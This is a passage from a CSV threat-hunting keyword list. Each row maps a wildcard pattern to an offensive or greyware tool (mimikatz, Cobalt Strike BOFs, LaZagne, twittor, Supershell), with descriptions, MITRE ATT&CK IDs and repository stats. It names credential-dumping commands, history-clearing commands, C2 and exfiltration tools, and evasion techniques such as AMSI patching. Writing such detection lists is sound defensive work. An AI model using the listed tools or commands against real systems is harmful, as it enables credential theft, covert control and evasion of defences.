more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,1,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*tricks01.hwtxt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*trickster0/Enyx*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*tricky.lnk*,offensive_tool_keyword,tricky.lnk,VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute,T1027 - T1036 - T1218.010,TA0002 - TA0003 - TA0008,N/A,N/A,Phishing,https://github.com/xillwillx/tricky.lnk,1,1,N/A,N/A,2,105,38,2020-12-19T23:42:10Z,2016-10-26T21:25:06Z -*TROJ_ZIPBOMB.*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Trojan.Lazagne*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*Trojan.Linux*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Trojan.Win32.*.*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Trojan.WinGo*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Trojan/Win32*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Trojan/Win64*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Trojan:PowerShell*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,trojan powershell signatures,10,10,N/A,N/A,N/A,N/A -*Trojan:Win32*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Trojan:Win32/IceId*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Trojan:Win32/Trickbot*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Trojan:Win64*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Trojan:Win64/IceId*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*TrojanDropper:Win32*,signature_keyword,Antivirus Signature,AV signature for 
exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*TrojanSpy:MSIL/JSSLoader*,signature_keyword,Antivirus Signature,antivirus signatures,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*TrojanSpy:MSIL/JSSLoader*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*truecrypt2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*True-Demon*,offensive_tool_keyword,Github Username,github repo hosting offensive tools and exploitation frameworks,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/True-Demon,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*trufflehog git *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*truffleHog*,offensive_tool_keyword,truffleHog,Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.,T1083 - T1081 - T1213 - T1212,TA0002 - TA0003 - TA0004 - TA0007,N/A,N/A,Information Gathering,https://github.com/dxa4481/truffleHog,1,0,N/A,N/A,10,12169,1420,2023-10-03T19:08:27Z,2016-12-31T05:08:12Z -*TruffleSnout.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*truncate -s0 *bash_history'*,greyware_tool_keyword,bash,Clear command history in linux which is used for defense evasion. ,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml,1,0,greyware tool - risks of False positive !,N/A,10,8145,2531,2023-10-03T21:23:41Z,2017-10-11T17:23:32Z -*--trusted-for-delegation --kdcHost *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*TrustedPath-UACBypass-BOF*,offensive_tool_keyword,cobaltstrike,Cobalt Strike beacon object file implementation for trusted path UAC bypass. 
The target executable will be called without involving cmd.exe by using DCOM object.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/TrustedPath-UACBypass-BOF,1,1,N/A,10,10,104,33,2021-08-16T07:49:55Z,2021-08-07T03:40:33Z -*trustedsec/social-engineer-toolkit*,offensive_tool_keyword,social-engineer-toolkit,The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. 
SET is a product of TrustedSec,T1566 - T1598,TA0001 - TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/trustedsec/social-engineer-toolkit,1,1,N/A,N/A,10,9394,2569,2023-08-25T17:25:45Z,2012-12-31T22:01:33Z -*trustedsec/unicorn*,offensive_tool_keyword,unicorn,Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory,T1059.001 - T1055.012 - T1027.002 - T1547.009,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/trustedsec/unicorn,1,1,N/A,N/A,10,3503,839,2023-09-15T05:43:27Z,2013-06-19T08:38:06Z -*TryCatchHCF*,offensive_tool_keyword,Github Username,github repo hosting sniffing spoofing and data exfiltration tools,N/A,N/A,N/A,N/A,Data Exfiltration,https://github.com/TryCatchHCF,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ts.php*vi.txt*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ts::logonpasswords*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. 
mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*ts::mstsc*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*ts::multirdp*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*ts::remote*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*ts::sessions*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*tshark *-i *,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*tshark -f *,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*tshark -Q*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*tshark -r *,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*tshark*.deb*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*tspkg/decryptor.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential 
Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*ttyd -i 0.0.0.0 -p 7681 *,greyware_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,0,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*ttyd -i 0.0.0.0 -p 7682 *,greyware_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,0,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*TunnelGRE/Augustus*,offensive_tool_keyword,Augustus,Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.,T1055.012 - T1027.002 - T1136.001 - T1562.001,TA0005 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/TunnelGRE/Augustus,1,1,N/A,6,2,107,23,2023-08-27T10:37:51Z,2023-08-21T15:08:40Z -*tunnels-prod-rel-tm.trafficmanager.net*,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. 
Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,1,1,N/A,8,10,N/A,N/A,N/A,N/A -*turn_keylogger*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*TVqQAAMAAAAEAAAA*,offensive_tool_keyword,base64,start of an executable payload in base64,T1574.002 - T1547.008 - T1059.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*TVqQAAMAAAAEAAAA*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*twint -g=*km* -o * --csv*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*twint -u * --since *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - 
?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*twittor.py*,offensive_tool_keyword,twittor,A fully featured backdoor that uses Twitter as a C&C server ,T1105 - T1102 - T1041,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/PaulSec/twittor,1,1,N/A,10,10,743,253,2020-09-30T13:47:31Z,2015-09-09T07:23:25Z -*twittor-master.zip*,offensive_tool_keyword,twittor,A fully featured backdoor that uses Twitter as a C&C server ,T1105 - T1102 - T1041,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/PaulSec/twittor,1,1,N/A,10,10,743,253,2020-09-30T13:47:31Z,2015-09-09T07:23:25Z -*TWV0YXNwbG9pdCBSUEMgTG9hZGVy*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z 
-*Tycx2ry/SweetPotato*,offensive_tool_keyword,cobaltstrike,Modified SweetPotato to work with CobaltStrike v4.0,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tycx2ry/SweetPotato_CS,1,1,N/A,10,10,236,49,2020-04-30T14:27:20Z,2020-04-16T08:01:31Z -*Tylous/SourcePoint*,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,1,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -*TypeError/domained*,offensive_tool_keyword,domained,A domain name enumeration tool,T1593 - T1594 - T1595 - T1567,TA0007 - TA0009 - TA0004,N/A,N/A,Information Gathering,https://github.com/TypeError/domained,1,1,N/A,N/A,8,719,164,2021-04-11T09:54:50Z,2017-08-18T00:03:39Z -*U2hlbGxjb2RlIFBhdGg=*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*U2VhdGJlbHQuZXhl*,offensive_tool_keyword,NetLoader,Loads any C# binary in memory - patching AMSI + ETW,T1055.012 - T1112 - T1562.001,TA0005 - TA0002,N/A,N/A,Exploitation tools - Defense Evasion,https://github.com/Flangvik/NetLoader,1,0,N/A,10,7,684,139,2021-10-03T16:41:03Z,2020-05-05T15:20:16Z -*U2VtaW5vbGVzd291bGRkZXN0cm95cGVubnN0YXRl*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*uac fodhelper *,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - 
